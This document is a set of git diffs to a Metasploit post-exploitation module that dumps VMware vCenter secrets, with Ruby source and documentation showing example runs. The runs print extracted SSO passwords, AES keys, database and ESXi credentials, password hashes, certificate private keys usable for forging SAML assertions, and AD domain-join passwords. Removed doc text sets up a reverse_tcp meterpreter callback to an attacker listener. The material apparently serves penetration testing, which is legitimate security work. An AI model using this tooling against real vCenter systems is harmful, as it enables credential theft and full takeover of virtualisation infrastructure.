+[+] vSphere SSO DC DN: cn=vctr01.cesium137.io,ou=Computers,dc=vsphere,dc=local
+[+] vSphere SSO DC PW: *Pz[aO0Udli"%mbt%`Gn
+[*] Extract vmware-vpx AES key ...
+[+] vSphere vmware-vpx AES encryption
+        HEX: db5beca47d9bb7af5da5278aeeee4b0a83076670736c46546f77a1ddfbe54f2e
+[*] Extracting PostgreSQL database credentials ...
+[+]     VCDB Name: VCDB
+[+]     VCDB User: vc
+[+]     VCDB Pass: cq1=+*f(gTQZ_6)Y
+[*] Extract ESXi host vpxuser credentials ...
+[+] ESXi Host esxi01.cesium137.io [192.168.0.101]  LOGIN: vpxuser PASS: 13M\.3LCb36n8:=_847HzS}U:c9@d65=
+[+] ESXi Host esxi02.cesium137.io [192.168.0.102]  LOGIN: vpxuser PASS: -0fQviFI0f}C@8:v3y[jP[\C{lqU8.kL
+[+] ESXi Host esxi03.cesium137.io [192.168.0.103]  LOGIN: vpxuser PASS: .TB4/OEr3H^pM.kj4a^-]0Z:_TWl{=_H
+[*] Extracting vSphere SSO domain secrets ...
+[*] Dumping vmdir schema to LDIF ...
+[+] LDIF Dump: /home/cs137/.msf4/loot/20220505083154_default_192.168.0.111_vmdir_383063.ldif
+[*] Processing vmdir LDIF (this may take several minutes) ...
+[*] Processing LDIF entries ...
+[*] Processing SSO account hashes ...
+[!] No password hashes found
+[*] Processing SSO identity sources ...
+[!] No SSO ID provider information found
+[*] Extracting certificates from vSphere platform ...
+[+] MACHINE_SSL_CERT key: /home/cs137/.msf4/loot/20220505083156_default_192.168.0.111___MACHINE_CERT_323341.key
+[+] MACHINE_SSL_CERT cert: /home/cs137/.msf4/loot/20220505083156_default_192.168.0.111___MACHINE_CERT_255826.pem
+[+] MACHINE key: /home/cs137/.msf4/loot/20220505083158_default_192.168.0.111_machine_248465.key
+[+] MACHINE cert: /home/cs137/.msf4/loot/20220505083159_default_192.168.0.111_machine_130920.pem
+[+] VSPHERE-WEBCLIENT key: /home/cs137/.msf4/loot/20220505083200_default_192.168.0.111_vspherewebclien_019114.key
+[+] VSPHERE-WEBCLIENT cert: /home/cs137/.msf4/loot/20220505083201_default_192.168.0.111_vspherewebclien_777853.pem
+[+] VPXD key: /home/cs137/.msf4/loot/20220505083202_default_192.168.0.111_vpxd_846784.key
+[+] VPXD cert: /home/cs137/.msf4/loot/20220505083202_default_192.168.0.111_vpxd_796349.pem
+[+] VPXD-EXTENSION key: /home/cs137/.msf4/loot/20220505083204_default_192.168.0.111_vpxdextension_570408.key
+[+] VPXD-EXTENSION cert: /home/cs137/.msf4/loot/20220505083204_default_192.168.0.111_vpxdextension_490761.pem
+[+] SMS key: /home/cs137/.msf4/loot/20220505083206_default_192.168.0.111_sms_self_signed_278681.key
+[+] SMS cert: /home/cs137/.msf4/loot/20220505083206_default_192.168.0.111_sms_self_signed_163386.pem
+[*] Searching for secrets in VM Guest Customization Specification XML ...
+[*] Processing vpx_customization_spec 'Windows 2019 Datacenter' ...
+[*] Validating data encipherment key ...
+[*] Initial administrator account password found for vpx_customization_spec 'Windows 2019 Datacenter':
+[+]     Initial Admin PW: IAmSam!
+[*] AD domain join account found for vpx_customization_spec 'Windows 2019 Datacenter':
+[+]     AD User: sam@cesium137.io
+[+]     AD Pass: Gr33n3gg$!
+[*] Post module execution completed

--- a/documentation/modules/post/linux/gather/vcenter_secrets_dump.md
+++ b/documentation/modules/post/linux/gather/vcenter_secrets_dump.md
@@ -47,85 +47,141 @@ DATA-ENCIPHERMENT key extracted from VMAFD. Defaults to true.
 Example run from meterpreter session on vCenter appliance version 7.0.2
 
 ```
-msf6 > use multi/handler
-set payload linux/x86/meterpreter/reverse_tcp
-[*] Using configured payload generic/shell_reverse_tcp
-msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
-payload => linux/x86/meterpreter/reverse_tcp
-set LPORT 4444
-msf6 exploit(multi/handler) > set LHOST 192.168.101.10
-LHOST => 192.168.101.10
-msf6 exploit(multi/handler) > set LPORT 4444
-LPORT => 4444
-msf6 exploit(multi/handler) > exploit
-
-[*] Started reverse TCP handler on 192.168.101.10:4444 
-[*] Sending stage (989032 bytes) to 192.168.100.11
-[*] Meterpreter session 1 opened (192.168.101.10:4444 -> 192.168.100.11:53410 ) at 2022-04-30 14:04:21 -0400
-
-meterpreter > bg
-[*] Backgrounding session 1...
 msf6 exploit(multi/handler) > use post/linux/gather/vcenter_secrets_dump
 msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
 session => 1
 msf6 post(linux/gather/vcenter_secrets_dump) > dump
 
 [*] Gathering vSphere SSO domain information ...
-[*] vSphere Hostname and IPv4: vcenteralpha..cesium137.io [192.168.100.11]
-[+] vSphere SSO DC DN: cn=vcenteralpha..cesium137.io,ou=Domain Controllers,dc=alpha,dc=vsphere,dc=local
-[+] vSphere SSO DC PW: .AwoZ1;wd>x_b=M1FQ'}
+[*] vSphere Hostname and IPv4: vcenterdelta.cesium137.io [192.168.100.70]
+[+] vSphere SSO DC DN: cn=vcenterdelta.cesium137.io,ou=Domain Controllers,dc=delta,dc=vsphere,dc=local
+[+] vSphere SSO DC PW: *6{ K3Ei*@<J[.gd5c3o
 [*] Extract vmdird tenant AES encryption keys ...
-[+] vSphere Tenant AES encryption key: OY;OTk3<W}tH[ze| hex: 0x4f593b4f546b333c577d74485b7a657c
+[+] vSphere Tenant AES encryption key: K-Z(x7wf35{E"I2v hex: 0x4b2d5a287837776633357b4522493276
 [*] Extracting PostgreSQL database credentials ...
-[+] VCDB Name: VCDB User: vc PW: my6h@)IN1jW$nHT{
+[+] VCDB Name: VCDB User: vc PW: 6!24A3W5LekCOPK=
 [*] Extracting vSphere SSO domain information ...
 [*] Dumping vmdir schema to LDIF ...
-[+] LDIF Dump: /home/cs137/.msf4/loot/20220430140904_default_192.168.100.11_vmdir_231364.ldif
+[+] LDIF Dump: /home/cs137/.msf4/loot/20220502094947_default_192.168.100.70_vmdir_313310.ldif
 [*] Processing vmdir LDIF (this may take several minutes) ...
 [*] Processing LDIF entries ...
 [*] Processing SSO account hashes ...
-[+] vSphere SSO User Credential: cn=vcenteralpha..cesium137.io,ou=Domain Controllers,dc=alpha,dc=vsphere,dc=local:$dynamic_82$f48caa19007e8bb3d76a7d172e2d1976f4747e0ed84159a712eb58156ede7478827909bf4acf9f71b74616ce5110d99b8426d8b3295b02c04aacff3c27607ab8$HEX$9374651ada3414775604fbdb150c8cdc
-[+] vSphere SSO User Credential: CN=waiter 66bac9fd-6a99-43eb-8661-1295c39e9e4d,cn=users,dc=alpha,dc=vsphere,dc=local:$dynamic_82$8335fa00d0498f1028691aced7d8945be0fa1f689dc628a3307ec7918a8fcdb04587ebd8a6dc1b14cacc0c11e4f84c5e022108e0950b62dc63f3f37c0a3b3453$HEX$4108122797d8894b9963e5ac943918b9
-[+] vSphere SSO User Credential: cn=krbtgt/ALPHA.VSPHERE.LOCAL,cn=users,dc=ALPHA,dc=VSPHERE,dc=LOCAL:$dynamic_82$0da378937caf846413b0a9a328e9fe901513bddddea9a0de5ca520f4d7eca9d2eeb7287a26f0d079941bb46df36a5b321c53b807e59c55b10bb62ff260e28021$HEX$266ca458d66911df01347b372939ae2a
-[+] vSphere SSO User Credential: cn=K/M,cn=users,dc=ALPHA,dc=VSPHERE,dc=LOCAL:$dynamic_82$c20ca496510e8e6a0d3d9aa470dfe0baf06ccfb2ecc2e4952d232859e8fc22ccd3108926eb115574043652157db3f1d557af1cd1580190546178758eee57834a$HEX$22209783f4c187b777a31c2a814c2ff7
-[+] vSphere SSO User Credential: cn=Administrator,cn=Users,dc=alpha,dc=vsphere,dc=local:$dynamic_82$f96cd214646ba2e4e21774a183f18572bc3d6c4174801d0523cbdc04d02bf69b102bfe9d68fdd71c5866f4972b2359516e65f59c4bda6eebd3cdca59b5f55be8$HEX$4f267135b496ff3119afc21fefda8643
-[+] vSphere SSO User Credential: cn=vmca/vcenteralpha..cesium137.io@ALPHA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=alpha,dc=vsphere,dc=local:$dynamic_82$ee963a2f36d38a73e5cf4be729e7be4f491c97fc91b3e9bed96216de9bf72914d1442c49650b07366e9347369ce892d823e06613195027e3f44dfd50662b98dc$HEX$842fdf0b5b972c8f722fb3139142231d
-[+] vSphere SSO User Credential: cn=ldap/vcenteralpha..cesium137.io@ALPHA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=alpha,dc=vsphere,dc=local:$dynamic_82$85523e5ad2ac353b925a0cc9f0fad88c881b17d5b218fdd568fb819a7bc58abf7e8783013e22468c657cae7f776ec77fb8b0ad815ef5cdc6ea114c701f19fa52$HEX$4faf7011a11a4939216a1211a4b08cea
-[+] vSphere SSO User Credential: cn=DNS/vcenteralpha..cesium137.io@ALPHA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=alpha,dc=vsphere,dc=local:$dynamic_82$ad40b15f98588bc0c856a0f881ea857d6f3442a6755b9c33e40c7960d1833414d25ef96120f9416fca96d0ecfe3df6ddc1e992e5881baeacdcc4610bd43eda79$HEX$f3d9e1c742d9342c78c1825ab5b7efee
-[+] vSphere SSO User Credential: cn=host/vcenteralpha..cesium137.io@ALPHA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=alpha,dc=vsphere,dc=local:$dynamic_82$bbcb9c30d8c1a40f409d24fe6ede60df7bf4860a9bdd50b146d063a194fdadb0df80d81ea5ea48a377f20709fa1c22f696facde785b160ceb0eb92eb5f8c5308$HEX$5fab6ef4332396fb4b4410cca448d52d
+[+] vSphere SSO User Credential: CN=workload_storage_management-07afcee6-c2e2-4d0a-aa28-0305ab5825a4,cn=ServicePrincipals,dc=delta,dc=vsphere,dc=local:$dynamic_82$dc5845fe5c4efe7dcfc330d1dfc41c9e537976c8e03198e47a8642ac766745939ed794393f95567e579ddf473050754d2c0b1f751c077a5c963ceda7d6d00122$HEX$edb031a9330b1d1ff17527976a601107
+[+] vSphere SSO User Credential: cn=vcenterdelta.cesium137.io,ou=Domain Controllers,dc=delta,dc=vsphere,dc=local:$dynamic_82$d857c278b1dfa799e293f0f35551d29b01973c24ef9e2c0e079d09049826ca824757f8377e7646e003272a39ae459a66c5fca54ac76eb67ddc5d1133cb4c4628$HEX$4ae8badb536deab2c3be64d3a1dfeb2e
+[+] vSphere SSO User Credential: CN=waiter-0ad33e8d-0ca0-4912-8eb0-0a80a16fda82,cn=users,dc=delta,dc=vsphere,dc=local:$dynamic_82$9a9dd8ec92a332b91b7602d45404a144973c75f54111ecf7cdfa70cea29e358838132f8380361091a40efdf52c5ac34cfd988574e489a83e2c1f1438c764bad0$HEX$2971d8fd5160de2e71a0dfa744af5d6b
+[+] vSphere SSO User Credential: cn=krbtgt/DELTA.VSPHERE.LOCAL,cn=users,dc=DELTA,dc=VSPHERE,dc=LOCAL:$dynamic_82$41437d26f1d4c2cdc67cff7ec66f91da643cb4b331fc00fa052ace43e4eae7ef277f9b9b05d5c06c46f5b73bc2132ed772552274464098d2479604161a001d32$HEX$5a21a4b810348c78f9997a3c405f3340
+[+] vSphere SSO User Credential: cn=K/M,cn=users,dc=DELTA,dc=VSPHERE,dc=LOCAL:$dynamic_82$aa0ef201580566738898162a079c70daa0bb19be0927d6b44ac3d65724df1e14cd6c273c132cd117b98ed8c7b37d2ae861d96e6ff28e97e81f54629072a83e62$HEX$031df0af1964ea1e5c733541f2f89a7d
+[+] vSphere SSO User Credential: cn=Administrator,cn=Users,dc=delta,dc=vsphere,dc=local:$dynamic_82$cd4362341bb01e2de096c262c59e3c6f8bedf78ae96f378de57e369d5071f114fba4c43c4d577317ea3d923eafa9b9a6f6154a10d0e81f7fa00fb711b3519a8c$HEX$0155fb261f868fbf8f3feda9139acc50
+[+] vSphere SSO User Credential: cn=vmca/vcenterdelta.cesium137.io@DELTA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=delta,dc=vsphere,dc=local:$dynamic_82$b478eb780a9f43960541a236b4f258bf9d7726f76d6f9d13f25fc815bac002b191be96a90c87bf607b54e13769878b5863cde7eb12b151db5c5892e9b00e5f48$HEX$a56c39678fd290619f726e31c5d6fce8
+[+] vSphere SSO User Credential: cn=ldap/vcenterdelta.cesium137.io@DELTA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=delta,dc=vsphere,dc=local:$dynamic_82$efeb6777719ccb7278a6c216e3a307bc0a4a9ecbf240a36a6947161dbd44e143cb8fa9712f2629e7022bb2bcdf3c144b7ecbbc499f15dd3791e920205ec7fcba$HEX$bb3eddcba08bf93c372f23a45c5fb651
+[+] vSphere SSO User Credential: cn=DNS/vcenterdelta.cesium137.io@DELTA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=delta,dc=vsphere,dc=local:$dynamic_82$059761db3117ce52c864cf5dab7b6320f47d0e09c1ff3afaa0835fe4775aa0669a09ee26412e15bfc8337a9747e73e4ffab1859292e716dba0e92104708332a6$HEX$4629f7e9c587f6d1b57b2f56e96bf05a
+[+] vSphere SSO User Credential: cn=host/vcenterdelta.cesium137.io@DELTA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=delta,dc=vsphere,dc=local:$dynamic_82$6b11a2b58752e8409f57bc72b45e6599209714000b8a17e95d661663d54d691ce013be2700fa6c8e30e6d98259d1810c5f883fcc8099bd16342e6a4c0d179895$HEX$2a14a8f480ca071f6edffd3720732d5d
+[*] Processing SSO identity sources ...
+[*] Found SSO Identity Source Credential:
+[+] IDENTITY_STORE_TYPE_VMWARE_DIRECTORY @ ldap://vcenterdelta.cesium137.io:389:
+[+] SSOUSER: vcenterdelta.cesium137.io@delta.vsphere.local
+[+] SSOPASS: *6{ K3Ei*@<J[.gd5c3o
+[+] SSODOMAIN: delta.vsphere.local
+[*] Found SSO Identity Source Credential:
+[+] IDENTITY_STORE_TYPE_LDAP_WITH_AD_MAPPING @ ldap://cesium137.io:
+[+] SSOUSER: CESIUM137\ldap
+[+] SSOPASS: ThisIsSecret!
+[+] SSODOMAIN: cesium137.io
+[*] Extracting certificates from vSphere platform ...
+[+] VMCA_ROOT key: /home/cs137/.msf4/loot/20220502094949_default_192.168.100.70_vmca_533515.key
+[+] VMCA_ROOT cert: /home/cs137/.msf4/loot/20220502094950_default_192.168.100.70_vmca_297516.pem
+[+] SSO_STS_IDP key: /home/cs137/.msf4/loot/20220502094951_default_192.168.100.70_idp_205474.key
+[+] SSO_STS_IDP cert: /home/cs137/.msf4/loot/20220502094951_default_192.168.100.70_idp_311054.pem
+[+] MACHINE_SSL_CERT key: /home/cs137/.msf4/loot/20220502094954_default_192.168.100.70___MACHINE_CERT_414635.key
+[+] MACHINE_SSL_CERT cert: /home/cs137/.msf4/loot/20220502094955_default_192.168.100.70___MACHINE_CERT_332870.pem
+[+] MACHINE key: /home/cs137/.msf4/loot/20220502094957_default_192.168.100.70_machine_023374.key
+[+] MACHINE cert: /home/cs137/.msf4/loot/20220502094958_default_192.168.100.70_machine_922815.pem
+[+] VSPHERE-WEBCLIENT key: /home/cs137/.msf4/loot/20220502095000_default_192.168.100.70_vspherewebclien_713962.key
+[+] VSPHERE-WEBCLIENT cert: /home/cs137/.msf4/loot/20220502095000_default_192.168.100.70_vspherewebclien_136515.pem
+[+] VPXD key: /home/cs137/.msf4/loot/20220502095002_default_192.168.100.70_vpxd_481212.key
+[+] VPXD cert: /home/cs137/.msf4/loot/20220502095003_default_192.168.100.70_vpxd_493549.pem
+[+] VPXD-EXTENSION key: /home/cs137/.msf4/loot/20220502095005_default_192.168.100.70_vpxdextension_165639.key
+[+] VPXD-EXTENSION cert: /home/cs137/.msf4/loot/20220502095005_default_192.168.100.70_vpxdextension_834804.pem
+[+] HVC key: /home/cs137/.msf4/loot/20220502095007_default_192.168.100.70_hvc_915656.key
+[+] HVC cert: /home/cs137/.msf4/loot/20220502095008_default_192.168.100.70_hvc_016439.pem
+[+] DATA-ENCIPHERMENT key: /home/cs137/.msf4/loot/20220502095010_default_192.168.100.70_dataenciphermen_687504.key
+[+] DATA-ENCIPHERMENT cert: /home/cs137/.msf4/loot/20220502095010_default_192.168.100.70_dataenciphermen_813371.pem
+[+] SMS key: /home/cs137/.msf4/loot/20220502095012_default_192.168.100.70_sms_self_signed_661559.key
+[+] SMS cert: /home/cs137/.msf4/loot/20220502095013_default_192.168.100.70_sms_self_signed_175435.pem
+[+] WCP key: /home/cs137/.msf4/loot/20220502095015_default_192.168.100.70_wcp_787364.key
+[+] WCP cert: /home/cs137/.msf4/loot/20220502095016_default_192.168.100.70_wcp_947384.pem
+[*] Searching for secrets in VM Guest Customization Specification XML ...
+[*] Processing vpx_customization_spec 'Good Win10 Template with Local and Domain Join' ...
+[*] Validating data encipherment key ...
+[*] Initial administrator account password found for vpx_customization_spec 'Good Win10 Template with Local and Domain Join':
+[+] Built-in administrator PW: SamIAm!
+[*] AD domain join account found for vpx_customization_spec 'Good Win10 Template with Local and Domain Join':
+[+] AD User: administrator@cesium137.io
+[+] AD Pass: IAmSam!
+[*] Processing vpx_customization_spec 'Borked Win10 Template' ...
+[*] Validating data encipherment key ...
+[!] Could not associate encryption public key with any of the private keys extracted from vCenter, skipping
+[*] Processing vpx_customization_spec 'Good Win10 Template with Local' ...
+[*] Validating data encipherment key ...
+[*] Initial administrator account password found for vpx_customization_spec 'Good Win10 Template with Local':
+[+] Built-in administrator PW: SamIAm!
+[*] Post module execution completed
+```
+
+Example run from vCenter 6.0 Update 3j
+
+```
+msf6 post(linux/gather/vcenter_secrets_dump) > dump
+
+[*] Gathering vSphere SSO domain information ...
+[*] vSphere Hostname and IPv4: vcenteralpha [192.168.100.60]
+[+] vSphere SSO DC DN: cn=vcenteralpha.cesium137.io,ou=Domain Controllers,dc=alpha,dc=vsphere,dc=local
+[+] vSphere SSO DC PW: <PMW{T:4mnb@UBs/$f(w
+[*] Extract vmdird tenant AES encryption keys ...
+[+] vSphere Tenant AES encryption key: (>d%>D3'i@rAj}!" hex: 0x283e64253e443327694072416a7d2122
+[*] Extracting PostgreSQL database credentials ...
+[+] VCDB Name: VCDB User: vc PW: 4yFcqZ2$m^&H<K?z
+[*] Extracting vSphere SSO domain information ...
+[*] Dumping vmdir schema to LDIF ...
+[+] LDIF Dump: /home/cs137/.msf4/loot/20220502085244_default_192.168.100.60_vmdir_046059.ldif
+[*] Processing vmdir LDIF (this may take several minutes) ...
+[*] Processing LDIF entries ...
+[*] Processing SSO account hashes ...
+[+] vSphere SSO User Credential: cn=vcenteralpha.cesium137.io,ou=Domain Controllers,dc=alpha,dc=vsphere,dc=local:$dynamic_82$95fe2a1c250329ff99f3ebf364a58f1ee4263560c30c8010c9774b4f5bf151ef3df4b378ab88a2e3629f714ed1b0060f3ae10b7bd7533d025f47d33542bf8ade$HEX$28d03ba88a83c83ae1d999b77259670c
+[+] vSphere SSO User Credential: CN=waiter 514f2778-d8c0-49aa-a10b-1951699cc8c6,cn=users,dc=alpha,dc=vsphere,dc=local:$dynamic_82$495c53a6dd4b813638608feb0b4a1b27045d41e36e798c68ebdb312edc2f16c77d780c2b4fc6bed438cfd0ef743f1c1e0363692bd2c195371c2d4dd0b9862f39$HEX$b74fe42af9579d6c5536a50872c9eedf
+[+] vSphere SSO User Credential: cn=krbtgt/ALPHA.VSPHERE.LOCAL,cn=users,dc=ALPHA,dc=VSPHERE,dc=LOCAL:$dynamic_82$1c01a034aadd563bea5be04b9e74dbc5bb9ac37694f58bda6eea0e83df97bc64e5fdf932991a9bcaaf82da6300542e8d8d51c16282e9aaa08da2c6c65a8b7cdc$HEX$2434b5c538e31bb3854bcd277a5f63ab
+[+] vSphere SSO User Credential: cn=K/M,cn=users,dc=ALPHA,dc=VSPHERE,dc=LOCAL:$dynamic_82$525d688d4614db9939ffdba8e41e76bc3bd473b0cc4fdeac0994042d3a5a7adc9c8e46040c846d6c7f449f7f94f9d3370cc554ab668dcd3d1006ca38a60fb70d$HEX$fd6001dd5be548498d94bf08641d657d
+[+] vSphere SSO User Credential: cn=Administrator,cn=Users,dc=alpha,dc=vsphere,dc=local:$dynamic_82$3a4fc4fbacbc6d10e4787383841ebc38fc20ebbb7780692ee0c5fa4b1a2bd675b7c41e8604f4a0eba9546993b971790115279281a108e6e21f4b83740fae449f$HEX$db1d08918cc2eb7bb372545b449643ca
+[+] vSphere SSO User Credential: cn=vmca/vcenteralpha.cesium137.io@ALPHA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=alpha,dc=vsphere,dc=local:$dynamic_82$6d7a381d442a674bcc730604160c6963adc937a45a14b9d8e750b55fd3500e54c1bd739968a611a63f747db0ebbe8d31f0d96e5b84a2d72c3c79f922e922adc7$HEX$68fbf3edaba87c972f2423d670377cd7
+[+] vSphere SSO User Credential: cn=ldap/vcenteralpha.cesium137.io@ALPHA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=alpha,dc=vsphere,dc=local:$dynamic_82$f584f632b79113f1a5f31d0d8e1df094438fd1644140fd3692a880e4c3ddb8a25969a71ec0e10b31c61aa256217cc0e4c014a21350645b2a3fb7327d0ee5f96a$HEX$9cfee2bcd297134f1d5a921c20f373e8
+[+] vSphere SSO User Credential: cn=host/vcenteralpha.cesium137.io@ALPHA.VSPHERE.LOCAL,cn=Managed Service Accounts,dc=alpha,dc=vsphere,dc=local:$dynamic_82$ac83726dabc4a021b7737b1e696eba9067e73fc8058e719733b2f4ebded115ae653dd75f13ec26b6a641986c772b20bf37be999c9978d220e94f1d0eeab9d3b8$HEX$91dae8ef6feae8880dd9708664040598
 [*] Processing SSO identity sources ...
 [*] Found SSO Identity Source Credential:
 [+] IDENTITY_STORE_TYPE_VMWARE_DIRECTORY @ ldap://localhost:389:
-[+] SSOUSER: vcenteralpha..cesium137.io@alpha.vsphere.local
-[+] SSOPASS: .AwoZ1;wd>x_b=M1FQ'}
+[+] SSOUSER: cn=vcenteralpha.cesium137.io,ou=Domain Controllers,DC=alpha,DC=vsphere,DC=local
+[+] SSOPASS: <PMW{T:4mnb@UBs/$f(w
 [+] SSODOMAIN: alpha.vsphere.local
-[*] Found SSO Identity Source Credential:
-[+] IDENTITY_STORE_TYPE_LDAP_WITH_AD_MAPPING @ ldap://cesium137.io:3268:
-[+] SSOUSER: CESIUM137\ldap
-[+] SSOPASS: SamIAm!
-[+] SSODOMAIN: cesium137.io
 [*] Extracting certificates from vSphere platform ...
-[+] VMCA_ROOT key: /home/cs137/.msf4/loot/20220430140906_default_192.168.100.11_vmca_936623.key
-[+] VMCA_ROOT cert: /home/cs137/.msf4/loot/20220430140907_default_192.168.100.11_vmca_555488.pem
-[+] SSO_STS_IDP key: /home/cs137/.msf4/loot/20220430140909_default_192.168.100.11_idp_464049.key
-[+] SSO_STS_IDP cert: /home/cs137/.msf4/loot/20220430140909_default_192.168.100.11_idp_273306.pem
-[+] MACHINE_SSL_CERT key: /home/cs137/.msf4/loot/20220430140910_default_192.168.100.11_ssl_509899.key
-[+] MACHINE_SSL_CERT cert: /home/cs137/.msf4/loot/20220430140910_default_192.168.100.11_ssl_581440.pem
-[+] DATA-ENCIPHERMENT key: /home/cs137/.msf4/loot/20220430140911_default_192.168.100.11_data_110634.key
-[+] DATA-ENCIPHERMENT cert: /home/cs137/.msf4/loot/20220430140911_default_192.168.100.11_data_051751.pem
-[+] VSPHERE-WEBCLIENT key: /home/cs137/.msf4/loot/20220430140912_default_192.168.100.11_webclient_908714.key
-[+] VSPHERE-WEBCLIENT cert: /home/cs137/.msf4/loot/20220430140913_default_192.168.100.11_webclient_473307.pem
-[+] VPXD key: /home/cs137/.msf4/loot/20220430140913_default_192.168.100.11_vpxd_232400.key
-[+] VPXD cert: /home/cs137/.msf4/loot/20220430140914_default_192.168.100.11_vpxd_225856.pem
-[+] VPXD-EXTENSION key: /home/cs137/.msf4/loot/20220430140915_default_192.168.100.11_vpxdext_365675.key
-[+] VPXD-EXTENSION cert: /home/cs137/.msf4/loot/20220430140915_default_192.168.100.11_vpxdext_458408.pem
+[+] VMCA_ROOT key: /home/cs137/.msf4/loot/20220502085246_default_192.168.100.60_vmca_730841.key
+[+] VMCA_ROOT cert: /home/cs137/.msf4/loot/20220502085246_default_192.168.100.60_vmca_303377.pem
+[!] vmwSTSPrivateKey was not found in vmdir, checking for legacy ssoserverSign key PEM files ...
+[-] Unable to query IDM tenant information, cannot validate ssoserverSign certificate against IDM
+[!] Could not reconcile vmdir STS IdP cert chain with cert chain advertised by IDM - this credential may not work
+[+] SSO_STS_IDP key: /home/cs137/.msf4/loot/20220502085248_default_192.168.100.60_idp_374103.key
+[+] SSO_STS_IDP cert: /home/cs137/.msf4/loot/20220502085249_default_192.168.100.60_idp_897642.pem
+[+] MACHINE_SSL_CERT key: /home/cs137/.msf4/loot/20220502085251_default_192.168.100.60___MACHINE_CERT_266327.key
+[+] MACHINE_SSL_CERT cert: /home/cs137/.msf4/loot/20220502085252_default_192.168.100.60___MACHINE_CERT_869538.pem
+[+] MACHINE key: /home/cs137/.msf4/loot/20220502085255_default_192.168.100.60_machine_898622.key
+[+] MACHINE cert: /home/cs137/.msf4/loot/20220502085255_default_192.168.100.60_machine_140140.pem
+[+] VSPHERE-WEBCLIENT key: /home/cs137/.msf4/loot/20220502085257_default_192.168.100.60_vspherewebclien_752462.key
+[+] VSPHERE-WEBCLIENT cert: /home/cs137/.msf4/loot/20220502085258_default_192.168.100.60_vspherewebclien_504719.pem
+[+] VPXD key: /home/cs137/.msf4/loot/20220502085259_default_192.168.100.60_vpxd_602894.key
+[+] VPXD cert: /home/cs137/.msf4/loot/20220502085300_default_192.168.100.60_vpxd_332516.pem
+[+] VPXD-EXTENSION key: /home/cs137/.msf4/loot/20220502085302_default_192.168.100.60_vpxdextension_363126.key
+[+] VPXD-EXTENSION cert: /home/cs137/.msf4/loot/20220502085303_default_192.168.100.60_vpxdextension_268974.pem
+[+] SMS key: /home/cs137/.msf4/loot/20220502085304_default_192.168.100.60_sms_self_signed_164497.key
+[+] SMS cert: /home/cs137/.msf4/loot/20220502085305_default_192.168.100.60_sms_self_signed_765910.pem
 [*] Searching for secrets in VM Guest Customization Specification XML ...
-[*] Initial administrator account password found for vpx_customization_spec 'Windows 10 Ent No Domain Join':
-[+] Built-in administrator PW: IAmSam!
-[*] Initial administrator account password found for vpx_customization_spec 'Windows 10 Ent':
-[+] Built-in administrator PW: Metasploit1$
-[*] AD domain join account found for vpx_customization_spec 'Windows 10 Ent':
-[+] AD User: administrator@cesium137.io
-[+] AD Pass: ThisIsSecret!
+[!] No vpx_customization_spec entries evident
 [*] Post module execution completed
 ```

--- a/modules/post/linux/gather/vcenter_secrets_dump.rb
+++ b/modules/post/linux/gather/vcenter_secrets_dump.rb
@@ -135,9 +135,9 @@ class MetasploitModule < Msf::Post
       fail_with(Msf::Exploit::Failure::Unknown, 'Could not determine vmdir dcAccountPassword from lwregshell')
     end
 
-    @bind_pw = @bind_pw[1..@bind_pw.length - 2]
+    @bind_pw = @bind_pw[1..@bind_pw.length - 2].gsub('\"', '"')
     print_good("vSphere SSO DC PW: #{@bind_pw}")
-    @shell_bind_pw = "'#{@bind_pw.gsub('\"', '"').gsub("'") { "\\'" }}'"
+    @shell_bind_pw = "'#{@bind_pw.gsub("'") { "\\'" }}'"
 
     extra_service_data = {
       address: Rex::Socket.getaddress(rhost),
@@ -720,7 +720,7 @@ class MetasploitModule < Msf::Post
       esxi_user = row_data[2]
 
       vpxuser_secret_b64 = row_data[3].gsub('*', '')
-      esxi_pass = vpx_aes_decrypt(vpxuser_secret_b64)
+      esxi_pass = vpx_aes_decrypt(vpxuser_secret_b64).gsub('\"', '"')
 
       print_good("ESXi Host #{esxi_fqdn} [#{esxi_ipv4}]\t LOGIN: #{esxi_user} PASS: #{esxi_pass}")
 

--- a/modules/post/linux/gather/vcenter_secrets_dump.rb
+++ b/modules/post/linux/gather/vcenter_secrets_dump.rb
@@ -1,0 +1,432 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'metasploit/framework/credential_collection'
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::Common
+  include Msf::Auxiliary::Report
+
+  Rank = ManualRanking
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'VMware vCenter Secrets Dump',
+        'Description' => %q{
+          Grab secrets and keys from the vCenter server and add them to
+          loot. This module is tested against the vCenter appliance only;
+          it will not work on Windows vCenter instances. It is intended to
+          be run after successfully acquiring root access on a vCenter
+          appliance and is useful for penetrating further into the
+          environment following a vCenter exploit that results in a root
+          shell.
+
+          Secrets include the dcAccountDN and dcAccountPassword for
+          the vCenter machine which can be used for maniuplating the SSO
+          domain via standard LDAP interface; good for plugging into the
+          vmware_vcenter_vmdir_ldap module or for adding new SSO admin
+          users. The MACHINE_SSL, VMCA_ROOT and SSO IdP certificates with
+          assocaited private keys are also plundered and can be used to
+          sign forged SAML assertions for the /ui admin interface.
+        },
+        'Author' => 'npm[at]cesium137.io',
+        'Platform' => [ 'linux' ],
+        'DisclosureDate' => '2022-04-15',
+        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'License' => MSF_LICENSE,
+        'Actions' => [
+          [
+            'Dump',
+            {
+              'Description' => 'Dump vCenter Secrets'
+            }
+          ]
+        ],
+        'DefaultAction' => 'Dump',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ IOC_IN_LOGS ]
+        },
+        'Privileged' => true
+      )
+    )
+
+    register_advanced_options([
+      OptString.new('RHOSTS', [ false, 'The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit' ]),
+      OptPort.new('RPORT', [ false, 'The target port', 389 ]),
